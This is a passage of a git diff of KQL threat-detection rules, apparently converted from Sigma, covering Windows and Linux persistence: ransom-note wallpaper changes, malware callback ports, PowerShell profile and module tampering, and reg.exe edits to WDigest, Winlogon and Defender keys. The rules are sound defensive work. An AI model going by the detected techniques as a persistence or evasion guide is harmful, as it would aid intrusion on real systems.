b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_using_reg_exe.kql @@ -1,13 +1,13 @@ -// Title: Potentially Suspicious Desktop Background Change Using Reg.EXE -// Author: Stephen Lincoln @slincoln-aiq (AttackIQ) -// Date: 2023-12-21 -// Level: medium -// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. -// This is a common technique used by malware to change the desktop background to a ransom note or other image. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001 -// False Positives: -// - Administrative scripts that change the desktop background to a company logo or other image. - -DeviceProcessEvents +// Title: Potentially Suspicious Desktop Background Change Using Reg.EXE +// Author: Stephen Lincoln @slincoln-aiq (AttackIQ) +// Date: 2023-12-21 +// Level: medium +// Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. +// This is a common technique used by malware to change the desktop background to a ransom note or other image. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001 +// False Positives: +// - Administrative scripts that change the desktop background to a company logo or other image. + +DeviceProcessEvents | where (ProcessCommandLine contains "add" and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and (ProcessCommandLine contains "Control Panel\\Desktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\ActiveDesktop" or ProcessCommandLine contains "CurrentVersion\\Policies\\System") and ((ProcessCommandLine contains "/v NoChangingWallpaper" and ProcessCommandLine contains "/d 1") or (ProcessCommandLine contains "/v Wallpaper" and ProcessCommandLine contains "/t REG_SZ") or (ProcessCommandLine contains "/v WallpaperStyle" and ProcessCommandLine contains "/d 2")) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql index cc991980..95eb3ee2 100644 --- a/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql +++ b/KQL/rules/Persistence/potentially_suspicious_desktop_background_change_via_registry.kql @@ -1,13 +1,13 @@ -// Title: Potentially Suspicious Desktop Background Change Via Registry -// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ) -// Date: 2023-12-21 -// Level: medium -// Description: Detects registry value settings that would replace the user's desktop background. -// This is a common technique used by malware to change the desktop background to a ransom note or other image. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001 -// False Positives: -// - Administrative scripts that change the desktop background to a company logo or other image. - -DeviceRegistryEvents +// Title: Potentially Suspicious Desktop Background Change Via Registry +// Author: Nasreddine Bencherchali (Nextron Systems), Stephen Lincoln @slincoln-aiq (AttackIQ) +// Date: 2023-12-21 +// Level: medium +// Description: Detects registry value settings that would replace the user's desktop background. +// This is a common technique used by malware to change the desktop background to a ransom note or other image. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.impact, attack.t1112, attack.t1491.001 +// False Positives: +// - Administrative scripts that change the desktop background to a company logo or other image. + +DeviceRegistryEvents | where (RegistryKey contains "Control Panel\\Desktop" or RegistryKey contains "CurrentVersion\\Policies\\ActiveDesktop" or RegistryKey contains "CurrentVersion\\Policies\\System") and ((RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "NoChangingWallpaper") or RegistryKey endswith "\\Wallpaper" or (RegistryValueData =~ "2" and RegistryKey endswith "\\WallpaperStyle")) and (not(((RegistryValueData =~ "(Empty)" and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper") or InitiatingProcessFolderPath endswith "C:\\Windows\\Explorer.EXE" or InitiatingProcessFolderPath endswith "\\svchost.exe"))) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files\\Amazon\\EC2Launch\\EC2Launch.exe", "C:\\Program Files (x86)\\Amazon\\EC2Launch\\EC2Launch.exe")) and RegistryKey endswith "\\Control Panel\\Desktop\\Wallpaper"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql index e0f8d060..fcaa16fc 100644 --- a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql +++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Malware Callback Communication -// Author: Florian Roth (Nextron Systems) -// Date: 2017-03-19 -// Level: high -// Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.command-and-control, attack.t1571 - -DeviceNetworkEvents +// Title: Potentially Suspicious Malware Callback Communication +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-19 +// Level: high +// Description: Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1571 + +DeviceNetworkEvents | where (RemotePort in~ ("100", "198", "200", "243", "473", "666", "700", "743", "777", "1443", "1515", "1777", "1817", "1904", "1960", "2443", "2448", "3360", "3675", "3939", "4040", "4433", "4438", "4443", "4444", "4455", "5445", "5552", "5649", "6625", "7210", "7777", "8143", "8843", "9631", "9943", "10101", "12102", "12103", "12322", "13145", "13394", "13504", "13505", "13506", "13507", "14102", "14103", "14154", "49180", "65520", "65535")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql index 6b9b71f8..b0f448d3 100644 --- a/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql +++ b/KQL/rules/Persistence/potentially_suspicious_malware_callback_communication_linux.kql @@ -1,10 +1,10 @@ -// Title: Potentially Suspicious Malware Callback Communication - Linux -// Author: hasselj -// Date: 2024-05-10 -// Level: high -// Description: Detects programs that connect to known malware callback ports based on threat intelligence reports. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.command-and-control, attack.t1571 - -DeviceNetworkEvents +// Title: Potentially Suspicious Malware Callback Communication - Linux +// Author: hasselj +// Date: 2024-05-10 +// Level: high +// Description: Detects programs that connect to known malware callback ports based on threat intelligence reports. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1571 + +DeviceNetworkEvents | where (RemotePort in~ ("888", "999", "2200", "2222", "4000", "4444", "6789", "8531", "50501", "51820")) and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql b/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql index 354f302d..70d9d6b1 100644 --- a/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql +++ b/KQL/rules/Persistence/potentially_suspicious_shell_script_creation_in_profile_folder.kql @@ -1,13 +1,13 @@ -// Title: Potentially Suspicious Shell Script Creation in Profile Folder -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: low -// Description: Detects the creation of shell scripts under the "profile.d" path. -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events. -// - Regular file creation during system update or software installation by the package manager - -DeviceFileEvents +// Title: Potentially Suspicious Shell Script Creation in Profile Folder +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: low +// Description: Detects the creation of shell scripts under the "profile.d" path. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate shell scripts in the "profile.d" directory could be common in your environment. Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events. +// - Regular file creation during system update or software installation by the package manager + +DeviceFileEvents | where FolderPath contains "/etc/profile.d/" and (FolderPath endswith ".csh" or FolderPath endswith ".sh") \ No newline at end of file diff --git a/KQL/rules/Persistence/powershell_module_file_created.kql b/KQL/rules/Persistence/powershell_module_file_created.kql index 9c246782..05104f54 100644 --- a/KQL/rules/Persistence/powershell_module_file_created.kql +++ b/KQL/rules/Persistence/powershell_module_file_created.kql @@ -1,12 +1,12 @@ -// Title: PowerShell Module File Created -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-09 -// Level: low -// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Likely - -DeviceFileEvents +// Title: PowerShell Module File Created +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-09 +// Level: low +// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Likely + +DeviceFileEvents | where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") \ No newline at end of file diff --git a/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql b/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql index 5c33c3aa..0fc8d086 100644 --- a/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql +++ b/KQL/rules/Persistence/powershell_module_file_created_by_non_powershell_process.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Module File Created By Non-PowerShell Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-09 -// Level: medium -// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process -// MITRE Tactic: Persistence -// Tags: attack.persistence - -DeviceFileEvents +// Title: PowerShell Module File Created By Non-PowerShell Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-09 +// Level: medium +// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process +// MITRE Tactic: Persistence +// Tags: attack.persistence + +DeviceFileEvents | where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or (InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/powershell_profile_modification.kql b/KQL/rules/Persistence/powershell_profile_modification.kql index 42f5f1c1..0971aa8c 100644 --- a/KQL/rules/Persistence/powershell_profile_modification.kql +++ b/KQL/rules/Persistence/powershell_profile_modification.kql @@ -1,12 +1,12 @@ -// Title: PowerShell Profile Modification -// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-24 -// Level: medium -// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013 -// False Positives: -// - System administrator creating Powershell profile manually - -DeviceFileEvents +// Title: PowerShell Profile Modification +// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-24 +// Level: medium +// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013 +// False Positives: +// - System administrator creating Powershell profile manually + +DeviceFileEvents | where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1" \ No newline at end of file diff --git a/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql b/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql index e12598f0..258befc7 100644 --- a/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql +++ b/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql @@ -1,12 +1,12 @@ -// Title: PowerShell Script Dropped Via PowerShell.EXE -// Author: frack113 -// Date: 2023-05-09 -// Level: low -// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence. -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. - -DeviceFileEvents +// Title: PowerShell Script Dropped Via PowerShell.EXE +// Author: frack113 +// Date: 2023-05-09 +// Level: low +// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. + +DeviceFileEvents | where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql index 65577a7d..4fbb64c8 100644 --- a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql +++ b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql @@ -1,13 +1,13 @@ -// Title: Process Explorer Driver Creation By Non-Sysinternals Binary -// Author: Florian Roth (Nextron Systems) -// Date: 2023-05-05 -// Level: high -// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. -// Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1068 -// False Positives: -// - Some false positives may occur with legitimate renamed process explorer binaries - -DeviceFileEvents +// Title: Process Explorer Driver Creation By Non-Sysinternals Binary +// Author: Florian Roth (Nextron Systems) +// Date: 2023-05-05 +// Level: high +// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. +// Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1068 +// False Positives: +// - Some false positives may occur with legitimate renamed process explorer binaries + +DeviceFileEvents | where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql index 12cfd2b6..aca6fe50 100644 --- a/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql +++ b/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql @@ -1,12 +1,12 @@ -// Title: Process Monitor Driver Creation By Non-Sysinternals Binary -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-05 -// Level: medium -// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1068 -// False Positives: -// - Some false positives may occur with legitimate renamed process monitor binaries - -DeviceFileEvents +// Title: Process Monitor Driver Creation By Non-Sysinternals Binary +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: medium +// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1068 +// False Positives: +// - Some false positives may occur with legitimate renamed process monitor binaries + +DeviceFileEvents | where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/pua_system_informer_execution.kql b/KQL/rules/Persistence/pua_system_informer_execution.kql index 47ec5b70..d2f4d415 100644 --- a/KQL/rules/Persistence/pua_system_informer_execution.kql +++ b/KQL/rules/Persistence/pua_system_informer_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - System Informer Execution -// Author: Florian Roth (Nextron Systems) -// Date: 2023-05-08 -// Level: medium -// Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.discovery, attack.defense-evasion, attack.t1082, attack.t1564, attack.t1543 -// False Positives: -// - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly - -DeviceProcessEvents +// Title: PUA - System Informer Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2023-05-08 +// Level: medium +// Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.discovery, attack.defense-evasion, attack.t1082, attack.t1564, attack.t1543 +// False Positives: +// - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly + +DeviceProcessEvents | where FolderPath endswith "\\SystemInformer.exe" or ProcessVersionInfoOriginalFileName =~ "SystemInformer.exe" or ProcessVersionInfoFileDescription =~ "System Informer" or ProcessVersionInfoProductName =~ "System Informer" or (MD5 startswith "19426363A37C03C3ED6FEDF57B6696EC" or SHA1 startswith "8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC" or SHA256 startswith "8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287") \ No newline at end of file diff --git a/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql b/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql index b3972ec5..44c1247a 100644 --- a/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql +++ b/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql @@ -1,10 +1,10 @@ -// Title: RedMimicry Winnti Playbook Registry Manipulation -// Author: Alexander Rausch -// Date: 2020-06-24 -// Level: high -// Description: Detects actions caused by the RedMimicry Winnti playbook -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: RedMimicry Winnti Playbook Registry Manipulation +// Author: Alexander Rausch +// Date: 2020-06-24 +// Level: high +// Description: Detects actions caused by the RedMimicry Winnti playbook +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data" \ No newline at end of file diff --git a/KQL/rules/Persistence/reg_add_suspicious_paths.kql b/KQL/rules/Persistence/reg_add_suspicious_paths.kql index de19f182..c7a12c29 100644 --- a/KQL/rules/Persistence/reg_add_suspicious_paths.kql +++ b/KQL/rules/Persistence/reg_add_suspicious_paths.kql @@ -1,12 +1,12 @@ -// Title: Reg Add Suspicious Paths -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: high -// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562.001 -// False Positives: -// - Rare legitimate add to registry via cli (to these locations) - -DeviceProcessEvents +// Title: Reg Add Suspicious Paths +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: high +// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562.001 +// False Positives: +// - Rare legitimate add to registry via cli (to these locations) + +DeviceProcessEvents | where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql index 41a02e7d..3b97c86d 100644 --- a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql +++ b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql @@ -1,13 +1,13 @@ -// Title: Register New IFiltre For Persistence -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-21 -// Level: medium -// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. -// You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. -// MITRE Tactic: Persistence -// Tags: attack.persistence -// False Positives: -// - Legitimate registration of IFilters by the OS or software - -DeviceRegistryEvents +// Title: Register New IFiltre For Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. +// You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate registration of IFilters by the OS or software + +DeviceRegistryEvents | where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey endswith "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}*" or RegistryKey endswith "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}*" or RegistryKey endswith "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}*" or RegistryKey endswith "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}*" or RegistryKey endswith "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}*" or RegistryKey endswith "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}*" or RegistryKey endswith "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}*" or RegistryKey endswith "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}*" or RegistryKey endswith "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}*" or RegistryKey endswith "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}*" or RegistryKey endswith "\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}*" or RegistryKey endswith "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}*" or RegistryKey endswith "\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}*" or RegistryKey endswith "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}*" or RegistryKey endswith "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}*" or RegistryKey endswith "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}*" or RegistryKey endswith "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}*" or RegistryKey endswith "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}*" or RegistryKey endswith "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}*" or RegistryKey endswith "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}*" or RegistryKey endswith "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}*" or RegistryKey endswith "\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}*" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey endswith "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_explorer_policy_modification.kql b/KQL/rules/Persistence/registry_explorer_policy_modification.kql index a14b0226..cf0c28fe 100644 --- a/KQL/rules/Persistence/registry_explorer_policy_modification.kql +++ b/KQL/rules/Persistence/registry_explorer_policy_modification.kql @@ -1,12 +1,12 @@ -// Title: Registry Explorer Policy Modification -// Author: frack113 -// Date: 2022-03-18 -// Level: medium -// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate admin script - -DeviceRegistryEvents +// Title: Registry Explorer Policy Modification +// Author: frack113 +// Date: 2022-03-18 +// Level: medium +// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu") \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_hide_function_from_user.kql b/KQL/rules/Persistence/registry_hide_function_from_user.kql index 0820c432..085d597f 100644 --- 